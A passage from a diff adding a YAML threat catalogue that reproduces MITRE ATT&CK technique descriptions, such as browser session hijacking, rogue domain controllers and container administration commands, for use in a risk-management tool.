+      \ \n\nAuthentication processes generally require a valid identity (e.g., username)\
+      \ along with one or more authentication factors (e.g., password, pin, physical\
+      \ smart card, token generator, etc.). Alternate authentication material is legitimately\
+      \ generated by systems after a user or application successfully authenticates\
+      \ by providing a valid identity and the required authentication factor(s). Alternate\
+      \ authentication material may also be generated during the identity creation\
+      \ process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate\
+      \ authentication material allows the system to verify an identity has successfully\
+      \ authenticated without asking the user to reenter authentication factor(s).\
+      \ Because the alternate authentication must be maintained by the system\u2014\
+      either in memory or on disk\u2014it may be at risk of being stolen through [Credential\
+      \ Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate\
+      \ authentication material, adversaries are able to bypass system access controls\
+      \ and authenticate to systems without knowing the plaintext password or any\
+      \ additional authentication factors.\nhttps://attack.mitre.org/techniques/T1550"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1011
+    name: T1011 - Exfiltration Over Other Network Medium
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to exfiltrate data over a different network
+      medium than the command and control channel. If the command and control network
+      is a wired Internet connection, the exfiltration may occur, for example, over
+      a WiFi connection, modem, cellular data connection, Bluetooth, or another radio
+      frequency (RF) channel.
+
+
+      Adversaries may choose to do this if they have sufficient access or proximity,
+      and the connection might not be secured or defended as well as the primary Internet-connected
+      channel because it is not routed through the same enterprise network.
+
+      https://attack.mitre.org/techniques/T1011'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1589
+    name: T1589 - Gather Victim Identity Information
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information about the victim''s identity
+      that can be used during targeting. Information about identities may include
+      a variety of details, including personal data (ex: employee names, email addresses,
+      etc.) as well as sensitive details such as credentials.
+
+
+      Adversaries may gather this information in various ways, such as direct elicitation
+      via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information
+      about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595))
+      such as probing and analyzing responses from authentication services that may
+      reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information
+      about victims may also be exposed to adversaries via online or other accessible
+      data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001)
+      or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation:
+      OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+      Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+      GitHub Gitrob)(Citation: CNET Leaks)
+
+
+      Gathering this information may reveal opportunities for other forms of reconnaissance
+      (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+      or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing
+      operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
+      and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)
+      or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+
+      https://attack.mitre.org/techniques/T1589'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1560
+    name: T1560 - Archive Collected Data
+    provider: MITRE ATT&CK
+    description: 'An adversary may compress and/or encrypt data that is collected
+      prior to exfiltration. Compressing the data can help to obfuscate the collected
+      data and minimize the amount of data sent over the network. Encryption can be
+      used to hide information that is being exfiltrated from detection or make exfiltration
+      less conspicuous upon inspection by a defender.
+
+
+      Both compression and encryption are done prior to exfiltration, and can be performed
+      using a utility, 3rd party library, or custom method.
+
+      https://attack.mitre.org/techniques/T1560'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1185
+    name: T1185 - Browser Session Hijacking
+    provider: MITRE ATT&CK
+    description: 'Adversaries may take advantage of security vulnerabilities and inherent
+      functionality in browser software to change content, modify user-behaviors,
+      and intercept information as part of various browser session hijacking techniques.(Citation:
+      Wikipedia Man in the Browser)
+
+
+      A specific example is when an adversary injects software into a browser that
+      allows them to inherit cookies, HTTP sessions, and SSL client certificates of
+      a user then use the browser as a way to pivot into an authenticated intranet.(Citation:
+      Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based
+      behaviors such as pivoting may require specific process permissions, such as
+      <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.
+
+
+      Another example involves pivoting browser traffic from the adversary''s browser
+      through the user''s browser by setting up a proxy which will redirect web traffic.
+      This does not alter the user''s traffic in any way, and the proxy connection
+      can be severed as soon as the browser is closed. The adversary assumes the security
+      context of whichever browser process the proxy is injected into. Browsers typically
+      create a new process for each tab that is opened and permissions and certificates
+      are separated accordingly. With these permissions, an adversary could potentially
+      browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
+      or webmail, that is accessible through the browser and which the browser has
+      sufficient permissions. Browser pivoting may also bypass security provided by
+      2-factor authentication.(Citation: cobaltstrike manual)
+
+      https://attack.mitre.org/techniques/T1185'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1021
+    name: T1021 - Remote Services
+    provider: MITRE ATT&CK
+    description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)\
+      \ to log into a service that accepts remote connections, such as telnet, SSH,\
+      \ and VNC. The adversary may then perform actions as the logged-on user.\n\n\
+      In an enterprise environment, servers and workstations can be organized into\
+      \ domains. Domains provide centralized identity management, allowing users to\
+      \ login using one set of credentials across the entire network. If an adversary\
+      \ is able to obtain a set of valid domain credentials, they could login to many\
+      \ different machines using remote access protocols such as secure shell (SSH)\
+      \ or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet\
+      \ Remote Desktop Services) They could also login to accessible SaaS or IaaS\
+      \ services, such as those that federate their identities to the domain. \n\n\
+      Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072)\
+      \ and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021)\
+      \ to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is\
+      \ native software used for remote management. ARD leverages a blend of protocols,\
+      \ including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the\
+      \ screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004)\
+      \ for secure file transfer.(Citation: Remote Management MDM macOS)(Citation:\
+      \ Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin\
+      \ Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code\
+      \ execution and perform lateral movement. In versions of macOS prior to 10.14,\
+      \ an adversary can escalate an SSH session to an ARD session which enables an\
+      \ adversary to accept TCC (Transparency, Consent, and Control) prompts without\
+      \ user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote\
+      \ Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop\
+      \ commands)\nhttps://attack.mitre.org/techniques/T1021"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1596
+    name: T1596 - Search Open Technical Databases
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search freely available technical databases for
+      information about victims that can be used during targeting. Information about
+      victims may be available in online databases and repositories, such as registrations
+      of domains/certificates as well as public collections of network data/artifacts
+      gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation:
+      Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation:
+      DigitalShadows CDN)(Citation: Shodan)
+
+
+      Adversaries may search in different open databases depending on what information
+      they seek to gather. Information from these sources may reveal opportunities
+      for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+      or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
+      establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)
+      or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)),
+      and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
+      or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+
+      https://attack.mitre.org/techniques/T1596'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1207
+    name: T1207 - Rogue Domain Controller
+    provider: MITRE ATT&CK
+    description: 'Adversaries may register a rogue Domain Controller to enable manipulation
+      of Active Directory data. DCShadow may be used to create a rogue Domain Controller
+      (DC). DCShadow is a method of manipulating Active Directory (AD) data, including
+      objects and schemas, by registering (or reusing an inactive registration) and
+      simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered,
+      a rogue DC may be able to inject and replicate changes into AD infrastructure
+      for any domain object, including credentials and keys.
+
+
+      Registering a rogue DC involves creating a new server and nTDSDSA objects in
+      the Configuration partition of the AD schema, which requires Administrator privileges
+      (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity
+      Mimikatz Guide)
+
+
+      This technique may bypass system logging and security monitors such as security
+      information and event management (SIEM) products (since actions taken on a rogue
+      DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique
+      may also be used to alter and delete replication and other associated metadata
+      to obstruct forensic analysis. Adversaries may also utilize this technique to
+      perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005)
+      and/or manipulate AD objects (such as accounts, access control lists, schemas)
+      to establish backdoors for Persistence. (Citation: DCShadow Blog)
+
+      https://attack.mitre.org/techniques/T1207'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1610
+    name: T1610 - Deploy Container
+    provider: MITRE ATT&CK
+    description: 'Adversaries may deploy a container into an environment to facilitate
+      execution or evade defenses. In some cases, adversaries may deploy a new container
+      to execute processes associated with a particular image or deployment, such
+      as processes that execute or download malware. In others, an adversary may deploy
+      a new container configured without network rules, user limitations, etc. to
+      bypass existing defenses within the environment.
+
+
+      Containers can be deployed by various means, such as via Docker''s <code>create</code>
+      and <code>start</code> APIs or via a web application such as the Kubernetes
+      dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes
+      Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based
+      on retrieved or built malicious images or from benign images that download and
+      execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
+
+      https://attack.mitre.org/techniques/T1610'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1112
+    name: T1112 - Modify Registry
+    provider: MITRE ATT&CK
+    description: 'Adversaries may interact with the Windows Registry to hide configuration
+      information within Registry keys, remove information as part of cleaning up,
+      or as part of other techniques to aid in persistence and execution.
+
+
+      Access to specific areas of the Registry depends on account permissions, some
+      requiring administrator-level access. The built-in Windows command-line utility
+      [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote
+      Registry modification. (Citation: Microsoft Reg) Other tools may also be used,
+      such as a remote access tool, which may contain functionality to interact with
+      the Registry through the Windows API.
+
+
+      Registry modifications may also include actions to hide keys, such as prepending
+      key names with a null character, which will cause an error and/or be ignored
+      when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities
+      using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may
+      abuse these pseudo-hidden keys to conceal payloads/commands used to maintain
+      persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps
+      Hiding Reg Jul 2017)
+
+
+      The Registry of a remote system may be modified to aid in execution of files
+      as part of lateral movement. It requires the remote Registry service to be running
+      on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+      are required, along with access to the remote system''s [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)
+      for RPC communication.
+
+      https://attack.mitre.org/techniques/T1112'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1580
+    name: T1580 - Cloud Infrastructure Discovery
+    provider: MITRE ATT&CK
+    description: "An adversary may attempt to discover infrastructure and resources\
+      \ that are available within an infrastructure-as-a-service (IaaS) environment.\
+      \ This includes compute service resources such as instances, virtual machines,\
+      \ and snapshots as well as resources of other services including the storage\
+      \ and database services.\n\nCloud providers offer methods such as APIs and commands\
+      \ issued through CLIs to serve information about infrastructure. For example,\
+      \ AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API\
+      \ that can return information about one or more instances within an account,\
+      \ the <code>ListBuckets</code> API that returns a list of all buckets owned\
+      \ by the authenticated sender of the request, the <code>HeadBucket</code> API\
+      \ to determine a bucket\u2019s existence along with access permissions of the\
+      \ request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access\
+      \ block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation:\
+      \ Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation:\
+      \ AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud\
+      \ compute instances list</code> command to list all Google Compute Engine instances\
+      \ in a project (Citation: Google Compute Instances), and Azure's CLI command\
+      \ <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft\
+      \ AZ CLI) In addition to API commands, adversaries can utilize open source tools\
+      \ to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation:\
+      \ Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate\
+      \ resources using a compromised user's access keys to determine which are available\
+      \ to that user.(Citation: Expel IO Evil in AWS) The discovery of these available\
+      \ resources may help adversaries determine their next steps in the Cloud environment,\
+      \ such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary\
+      \ may also use this information to change the configuration to make the bucket\
+      \ publicly accessible, allowing data to be accessed without authentication.\
+      \ Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code>\
+      \ to determine size, owner, permissions, and network ACLs of database resources.\
+      \ (Citation: AWS Describe DB Instances) Adversaries can use this information\
+      \ to determine the potential value of databases and discover the requirements\
+      \ to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526),\
+      \ this technique focuses on the discovery of components of the provided services\
+      \ rather than the services themselves.\nhttps://attack.mitre.org/techniques/T1580"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1491
+    name: T1491 - Defacement
+    provider: MITRE ATT&CK
+    description: 'Adversaries may modify visual content available internally or externally
+      to an enterprise network, thus affecting the integrity of the original content.
+      Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include
+      delivering messaging, intimidation, or claiming (possibly false) credit for
+      an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491)
+      in order to cause user discomfort, or to pressure compliance with accompanying
+      messages.
+
+      https://attack.mitre.org/techniques/T1491'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1535
+    name: T1535 - Unused/Unsupported Cloud Regions
+    provider: MITRE ATT&CK
+    description: 'Adversaries may create cloud instances in unused geographic service
+      regions in order to evade detection. Access is usually obtained through compromising
+      accounts used to manage cloud infrastructure.
+
+
+      Cloud service providers often provide infrastructure throughout the world in
+      order to improve performance, provide redundancy, and allow customers to meet
+      compliance requirements. Oftentimes, a customer will only use a subset of the
+      available regions and may not actively monitor other regions. If an adversary
+      creates resources in an unused region, they may be able to operate undetected.
+
+
+      A variation on this behavior takes advantage of differences in functionality
+      across cloud regions. An adversary could utilize regions which do not support
+      advanced detection services in order to avoid detection of their activity.
+
+
+      An example of adversary use of unused AWS regions is to mine cryptocurrency
+      through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which
+      can cost organizations substantial amounts of money over time depending on the
+      processing power used.(Citation: CloudSploit - Unused AWS Regions)
+
+      https://attack.mitre.org/techniques/T1535'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1563
+    name: T1563 - Remote Service Session Hijacking
+    provider: MITRE ATT&CK
+    description: 'Adversaries may take control of preexisting sessions with remote
+      services to move laterally in an environment. Users may use valid credentials
+      to log into a service specifically designed to accept remote connections, such
+      as telnet, SSH, and RDP. When a user logs into a service, a session will be
+      established that will allow them to maintain a continuous interaction with that
+      service.
+
+
+      Adversaries may commandeer these sessions to carry out actions on remote systems.
+      [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563)
+      differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021)
+      because it hijacks an existing session rather than creating a new session using
+      [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking
+      Medium)(Citation: Breach Post-mortem SSH Hijack)
+
+      https://attack.mitre.org/techniques/T1563'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1217
+    name: T1217 - Browser Information Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may enumerate information about browsers to learn more
+      about compromised environments. Data saved by browsers (such as bookmarks, accounts,
+      and browsing history) may reveal a variety of personal information about users
+      (e.g., banking sites, relationships/interests, social media, etc.) as well as
+      details about internal network resources such as servers, tools/dashboards,
+      or other related infrastructure.(Citation: Kaspersky Autofill)
+
+
+      Browser information may also highlight additional targets after an adversary
+      has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)
+      associated with logins cached by a browser.
+
+
+      Specific storage locations vary based on platform and/or application, but browser
+      information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation:
+      Chrome Roaming Profiles)
+
+      https://attack.mitre.org/techniques/T1217'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1092
+    name: T1092 - Communication Through Removable Media
+    provider: MITRE ATT&CK
+    description: 'Adversaries can perform command and control between compromised
+      hosts on potentially disconnected networks using removable media to transfer
+      commands from system to system. Both systems would need to be compromised, with
+      the likelihood that an Internet-connected system was compromised first and the
+      second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091).
+      Commands and files would be relayed from the disconnected system to the Internet-connected
+      system to which the adversary has direct access.
+
+      https://attack.mitre.org/techniques/T1092'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1222
+    name: T1222 - File and Directory Permissions Modification
+    provider: MITRE ATT&CK
+    description: "Adversaries may modify file or directory permissions/attributes\
+      \ to evade access control lists (ACLs) and access protected files.(Citation:\
+      \ Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)\
+      \ File and directory permissions are commonly managed by ACLs configured by\
+      \ the file or directory owner, or users with the appropriate permissions. File\
+      \ and directory ACL implementations vary by platform, but generally explicitly\
+      \ designate which users or groups can perform which actions (read, write, execute,\
+      \ etc.).\n\nModifications may include changing specific access rights, which\
+      \ may require taking ownership of a file or directory and/or elevated permissions\
+      \ depending on the file or directory\u2019s existing permissions. This may enable\
+      \ malicious activity such as modifying, replacing, or deleting specific files\
+      \ or directories. Specific file and directory modifications may be a required\
+      \ step for many techniques, such as establishing Persistence via [Accessibility\
+      \ Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization\
+      \ Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration\
+      \ Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking\
+      \ other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\
+      \nAdversaries may also change permissions of symbolic links. For example, malware\
+      \ (particularly ransomware) may modify symbolic links and associated settings\
+      \ to enable access to files from local shortcuts with remote paths.(Citation:\
+      \ new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation:\
+      \ blackmatter_blackcat)(Citation: fsutil_behavior)\nhttps://attack.mitre.org/techniques/T1222"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1595
+    name: T1595 - Active Scanning
+    provider: MITRE ATT&CK
+    description: 'Adversaries may execute active reconnaissance scans to gather information
+      that can be used during targeting. Active scans are those where the adversary
+      probes victim infrastructure via network traffic, as opposed to other forms
+      of reconnaissance that do not involve direct interaction.
+
+
+      Adversaries may perform different forms of active scanning depending on what
+      information they seek to gather. These scans can also be performed in various
+      ways, including using native features of network protocols such as ICMP.(Citation:
+      Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may
+      reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+      or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+      establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587)
+      or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or
+      initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
+      or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+
+      https://attack.mitre.org/techniques/T1595'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1548
+    name: T1548 - Abuse Elevation Control Mechanism
+    provider: MITRE ATT&CK
+    description: 'Adversaries may circumvent mechanisms designed to control elevate
+      privileges to gain higher-level permissions. Most modern systems contain native
+      elevation control mechanisms that are intended to limit privileges that a user
+      can perform on a machine. Authorization has to be granted to specific users
+      in order to perform tasks that can be considered of higher risk. An adversary
+      can perform several methods to take advantage of built-in control mechanisms
+      in order to escalate privileges on a system.
+
+      https://attack.mitre.org/techniques/T1548'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1125
+    name: T1125 - Video Capture
+    provider: MITRE ATT&CK
+    description: 'An adversary can leverage a computer''s peripheral devices (e.g.,
+      integrated cameras or webcams) or applications (e.g., video call services) to
+      capture video recordings for the purpose of gathering information. Images may
+      also be captured from devices or applications, potentially in specified intervals,
+      in lieu of video files.
+
+
+      Malware or scripts may be used to interact with the devices through an available
+      API provided by the operating system or an application to capture video or images.
+      Video or image files may be written to disk and exfiltrated later. This technique
+      differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due
+      to use of specific devices or applications for video recording rather than capturing
+      the victim''s screen.
+
+
+      In macOS, there are a few different malware samples that record the user''s
+      webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
+
+      https://attack.mitre.org/techniques/T1125'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1016
+    name: T1016 - System Network Configuration Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may look for details about the network configuration
+      and settings, such as IP and/or MAC addresses, of systems they access or through
+      information discovery of remote systems. Several operating system administration
+      utilities exist that can be used to gather this information. Examples include
+      [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101),
+      [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
+
+
+      Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      on network devices to gather information about configurations and settings,
+      such as IP addresses of configured interfaces and static/dynamic routes (e.g.
+      <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation:
+      Mandiant APT41 Global Intrusion )
+
+
+      Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016)
+      during automated discovery to shape follow-on behaviors, including determining
+      certain access within the target network and what actions to do next.
+
+      https://attack.mitre.org/techniques/T1016'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1087
+    name: T1087 - Account Discovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to get a listing of valid accounts, usernames,\
+      \ or email addresses on a system or within a compromised environment. This information\
+      \ can help adversaries determine which accounts exist, which can aid in follow-on\
+      \ behavior such as brute-forcing, spear-phishing attacks, or account takeovers\
+      \ (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries\
+      \ may use several methods to enumerate accounts, including abuse of existing\
+      \ tools, built-in commands, and potential misconfigurations that leak account\
+      \ names and roles or permissions in the targeted environment.\n\nFor examples,\
+      \ cloud environments typically provide easily accessible interfaces to obtain\
+      \ user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001)\
+      \ and other command line functionality to identify accounts. Information about\
+      \ email addresses and accounts may also be extracted by searching an infected\
+      \ system\u2019s files.\nhttps://attack.mitre.org/techniques/T1087"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1090
+    name: T1090 - Proxy
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use a connection proxy to direct network traffic
+      between systems or act as an intermediary for network communications to a command
+      and control server to avoid direct connections to their infrastructure. Many
+      tools exist that enable traffic redirection through proxies or port redirection,
+      including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap.
+      (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies
+      to manage command and control communications, reduce the number of simultaneous
+      outbound network connections, provide resiliency in the face of connection loss,
+      or to ride over existing trusted communications paths between victims to avoid
+      suspicion. Adversaries may chain together multiple proxies to further disguise
+      the source of malicious traffic.
+
+
+      Adversaries can also take advantage of routing schemes in Content Delivery Networks
+      (CDNs) to proxy command and control traffic.
+
+      https://attack.mitre.org/techniques/T1090'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1059
+    name: T1059 - Command and Scripting Interpreter
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse command and script interpreters to execute
+      commands, scripts, or binaries. These interfaces and languages provide ways
+      of interacting with computer systems and are a common feature across many different
+      platforms. Most systems come with some built-in command-line interface and scripting
+      capabilities, for example, macOS and Linux distributions include some flavor
+      of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows
+      installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)
+      and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+
+      There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006),
+      as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007)
+      and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
+
+
+      Adversaries may abuse these technologies in various ways as a means of executing
+      arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001)
+      payloads delivered to victims as lure documents or as secondary payloads downloaded
+      from an existing C2. Adversaries may also execute commands through interactive
+      terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021)
+      in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation:
+      Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell
+      Execution in Python)
+
+      https://attack.mitre.org/techniques/T1059'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1482
+    name: T1482 - Domain Trust Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to gather information on domain trust relationships
+      that may be used to identify lateral movement opportunities in Windows multi-domain/forest
+      environments. Domain trusts provide a mechanism for a domain to allow access
+      to resources based on the authentication procedures of another domain.(Citation:
+      Microsoft Trusts) Domain trusts allow the users of the trusted domain to access
+      resources in the trusting domain. The information discovered may help the adversary
+      conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005),
+      [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation:
+      AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts
+      can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET
+      methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359)
+      is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft
+      Operation Wilysupply)
+
+      https://attack.mitre.org/techniques/T1482'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1020
+    name: T1020 - Automated Exfiltration
+    provider: MITRE ATT&CK
+    description: "Adversaries may exfiltrate data, such as sensitive documents, through\
+      \ the use of automated processing after being gathered during Collection. \n\
+      \nWhen automated exfiltration is used, other exfiltration techniques likely\
+      \ apply as well to transfer the information out of the network, such as [Exfiltration\
+      \ Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration\
+      \ Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1020"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1070
+    name: T1070 - Indicator Removal
+    provider: MITRE ATT&CK
+    description: "Adversaries may delete or modify artifacts generated within systems\
+      \ to remove evidence of their presence or hinder defenses. Various artifacts\
+      \ may be created by an adversary or something that can be attributed to an adversary\u2019\
+      s actions. Typically these artifacts are used as defensive indicators related\
+      \ to monitored events, such as strings from downloaded files, logs that are\
+      \ generated from user actions, and other data analyzed by defenders. Location,\
+      \ format, and type of artifact (such as command or login history) are often\
+      \ specific to each platform.\n\nRemoval of these indicators may interfere with\
+      \ event collection, reporting, or other processes used to detect intrusion activity.\
+      \ This may compromise the integrity of security solutions by causing notable\
+      \ events to go unreported. This activity may also impede forensic analysis and\
+      \ incident response, due to lack of sufficient data to determine what occurred.\n\
+      https://attack.mitre.org/techniques/T1070"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1609
+    name: T1609 - Container Administration Command
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse a container administration service to execute
+      commands within a container. A container administration service such as the
+      Docker daemon, the Kubernetes API server, or the kubelet may allow remote management
+      of containers within an environment.(Citation: Docker Daemon CLI)(Citation:
+      Kubernetes API)(Citation: Kubernetes Kubelet)
+
+
+      In Docker, adversaries may specify an entrypoint during container deployment
+      that executes a script or command, or they may use a command such as <code>docker
+      exec</code> to execute a command within a running container.(Citation: Docker
+      Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient
+      permissions, they may gain remote execution in a container in the cluster via
+      interaction with the Kubernetes API server, the kubelet, or by running a command
+      such as <code>kubectl exec</code>.(Citation: Kubectl Exec Get Shell)
+
